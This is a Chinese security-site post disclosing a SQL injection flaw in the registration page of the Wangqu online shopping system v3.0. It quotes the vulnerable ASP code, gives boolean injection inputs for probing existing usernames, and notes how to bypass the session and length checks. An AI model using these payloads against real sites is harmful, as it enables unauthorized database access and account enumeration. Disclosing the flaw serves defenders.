作者:莫ㄨ问[B.H.S.T]&李宓
来源:www.vcsec.cn 本站原创
漏洞版本:网趣网上购物系统时尚版v3.0[其他版本暂未查看]
漏洞文件:register.asp在代码398-404行
具体代码如下:
sub saveuser()
// 利用session验证是否重复验证,这个好绕过,不过很烦人...需要重新开启IE就可以了.
if session("regtimes")=1 then
response.Write "<table width=100% border=0 cellspacing=0 cellpadding=0 align=center><tr><td height=300 align=center><font color=red>对不起,您刚注册过用户,请稍后再进行注册!</font></td></tr></table>"
response.End
end if
set rs=server.CreateObject("adodb.recordset")
// 判断注册的邮箱和用户名是否重复,只过滤了空格
rs.open "select * from [user] where UserEmail='"&trim(request("useremail"))&"' or UserName='"&trim(request("username"))&"'",conn,1,1
if rs.recordcount>0 then
---------------------后面插入数据库-------------------------
// 利用session验证是否重复验证,这个好绕过,不过很烦人...需要重新开启IE就可以了.
if session("regtimes")=1 then
response.Write "<table width=100% border=0 cellspacing=0 cellpadding=0 align=center><tr><td height=300 align=center><font color=red>对不起,您刚注册过用户,请稍后再进行注册!</font></td></tr></table>"
response.End
end if
set rs=server.CreateObject("adodb.recordset")
// 判断注册的邮箱和用户名是否重复,只过滤了空格
rs.open "select * from [user] where UserEmail='"&trim(request("useremail"))&"' or UserName='"&trim(request("username"))&"'",conn,1,1
if rs.recordcount>0 then
---------------------后面插入数据库-------------------------
比如你已经正常注册了一个Vcor的用户,邮箱awolf858@gmail.com
然后现在注册邮箱不一样哦
1.vcor' and '1'='1 //提示已存在的用户 这样检测出来是已经存在所以会提示重复
2.awolf ' and '1'='1 //提示注册成功.
另外用户名这里有长度限制可以本地突破.
大家自己测试.有点麻烦,利用session验证了.
如图:1.bmp
只显示10条记录相关文章
网趣网站管理系统--上传漏洞 (浏览: 13608, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12718, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11289, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15966, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12480, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9733, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7959, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12718, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11289, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15966, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12480, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9733, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7959, 评论: 0)